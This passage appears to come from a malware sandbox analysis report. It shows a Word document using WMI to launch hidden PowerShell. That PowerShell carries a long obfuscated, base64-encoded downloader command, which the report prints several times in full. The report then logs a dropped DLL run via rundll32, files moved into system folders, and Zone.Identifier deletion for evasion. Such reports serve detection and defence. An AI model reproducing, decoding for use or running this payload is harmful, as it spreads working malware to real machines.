AnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnA
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
                    Suspicious powershell command line foundShow sources
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                    Source: Yvtlx6p4.dll.5.drStatic PE information: real checksum: 0x4a297 should be: 0x40b13
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B0BD push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007BCA push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001FCE92 push cs; retf
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019CE92 push cs; retf
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001ACE92 push cs; retf
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001ECE92 push cs; retf
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_001ECE92 push cs; retf

                    Persistence and Installation Behavior:

                    barindex
                    Creates processes via WMIShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Ocet\gyzufj.pjrJump to behavior

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ocet\gyzufj.pjr:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Mylz\dnoauh.fda:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Skqv\bpgr.lft:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Rmmi\fgaafkb.bqv:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Eeay\tsbyty.hpi:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jfjk\etjwcl.eoy:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Cyjj\rnycqfi.rmc:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Fpxy\zbyjv.xxd:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Xcmo\muvihv.sjs:Zone.Identifier read attributes | delete
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
